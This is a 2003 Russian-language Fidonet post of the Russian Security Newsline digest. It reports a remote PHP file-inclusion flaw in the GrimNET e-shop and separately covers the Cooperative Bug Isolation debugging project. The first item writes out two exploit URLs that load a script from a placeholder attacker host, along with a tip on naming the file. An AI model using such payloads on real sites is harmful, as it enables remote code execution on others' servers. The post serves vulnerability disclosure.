|
ru.nethack
- RU.NETHACK -------------------------------------------------------------------
From : Dmitry Leonov 2:5020/400 21 Oct 2003 06:10:31
To : All
Subject : Russian Security Newsline 21.10.2003
--------------------------------------------------------------------------------
Приветствую!
Russian Security Newsline 21.10.2003
Выполнение произвольного PHP-кода в GrimNET e-shop
dl // 20.10.03 22:37
Hе представляю, насколько актуальна эта самая корейская система
электронных магазинов
[ http://www.grimnet.net/ ]
, но дырка любопытна и сама по себе.
Входящие в ее комплект файлы shop.html и notice.html позволяют подключить
к себе (и в дальнейшем выполнить) любой файл, указанный в переменной
incstr без какой бы то ни было проверки содержимого:
http://[victim]/shop.html?incstr=http://[hacker]/myfile.php
http://[victim]/notice.html?incstr=http://[hacker]/myfile.php
Если на атакующем хосте установлен php, то сценарию, естественно, нужно
дать расширение, не приводящее к его исполнению - например myfile.inc.
Источник: http://www.web-hack.ru
-----------------------------
Отладку программ - в массы!
Ktirf // 20.10.03 19:58
В университетах Беркли и Стэнфорда разрабатывается проект, призванный
улучшить снабжение разработчиков отладочной информацией. Проект называется
Cooperative Bug Isolation и движется дальше в направлении, намеченном
инструментом Dr. Watson и talkback-сборками Мозиллы. Суть проекта состоит
в использовании так называемых программ-сэмплеров. Введение сэмплера в
разрабатываемый продукт, которое производится специально измененной для
этого версией GCC, позволяет фиксировать прохождение определенных
чекпойнтов прямо во время работы продукта у конечного пользователя
(разумеется, пользователь должен согласиться на то, чтобы использовать
такую вот "отладочную" версию продукта). Hа данный момент в качестве
чекпойнтов выступают ветвления: сэмплер фиксирует, по какой ветке пошло
выполнение программы. Поскольку запоминать все ветвления может быть весьма
накладно, регистрация будет происходит эпизодически, по случайной выборке.
Единственным безусловно фиксирующимся событием является нормальное или
аномальное завершение программы.
Подобная технология была создана в надежде на то, что при достаточно
большом числе успешных и неуспешных прогонов удастся определять точки, в
которых программа делает первый "ложный шаг" и таким образом локализовать
причину ошибки. Первые пять продуктов с внедренными сэмплерами уже готовы
(это "Outlook для Linux" Evolution, графический редактор Gimp,
интернет-пейджер Gaim, процессор электронных таблиц Gnumeric, музредактор
RhythmBox и файловый менеджер Nautilus). Дело осталось за малым: найти
достаточное количество добровольцев, которые бы согласились пользоваться
экспериментальными сборками их любимых программ с целью помочь
разработчикам. Впрочем, в мире OpenSource с добровольцами никогда не было
особых проблем.
Источник: http://zdnet.ru/?ID=308172
-----------------------------
Также в выпуске:
Румыния - цитадель хакеров
(http://www.bugtraq.ru/rsn/archive/2003/10/35.html) // 20.10.03 19:06
Порция октябрьских security updates от Microsoft
(http://www.bugtraq.ru/rsn/archive/2003/10/34.html) // 16.10.03 13:55
DDoS-атаки на Зенон
(http://www.bugtraq.ru/rsn/archive/2003/10/30.html) // 15.10.03 00:12
Другие обновления на сайте:
BugTraq - обозрение #147
[ http://www.bugtraq.ru/review/archive/2003/16-10-03.html ]
// 16.10.03 13:56
- Порция октябрьских security updates от Microsoft;- XP Service Pack 2 выйдет в
декабре;- DDoS-атака на Зенон;- Пользователи Shift могут спать спокойно;-
Интересный эффект при запуске AVP в автономном режиме;
Третья пятерка из рейтинга статей:
[ http://www.bugtraq.ru/library/rating/ ]
Вирусы на службе силовых ведомств [8.3]
[ http://www.bugtraq.ru/library/security/luka/viruses.html ]
Субъективная оценка российских удалЛнных почтовых сервисов. Тестирование на
ошибки в Веб-интерфейсе. [8.25]
[ http://bugtraq.ru/library/www/testmail.html ]
Восстановление паролей к PWL-файлам [8]
[ http://www.bugtraq.ru/library/internals/pwl98.html ]
Страшный баг в Windows [8]
[ http://www.bugtraq.ru/review/selecta/wmtimer.html ]
Атака на DNS или Hочной кошмар сетевого администратора [8]
[ http://bugtraq.ru/library/security/dnspoison.html ]
Ведущие рассылки:
Владислав Мяснянкин, http://cybervlad.port5.com
Дмитрий Леонов, http://www.bugtraq.ru
--- ifmail v.2.15dev5
* Origin: Demos online service (2:5020/400)
Вернуться к списку тем, сортированных по: возрастание даты уменьшение даты тема автор
| Тема: |
Автор: |
Дата: |
|
Russian Security Newsline 21.10.2003 |
Dmitry Leonov |
21 Oct 2003 06:10:31 |
|
|
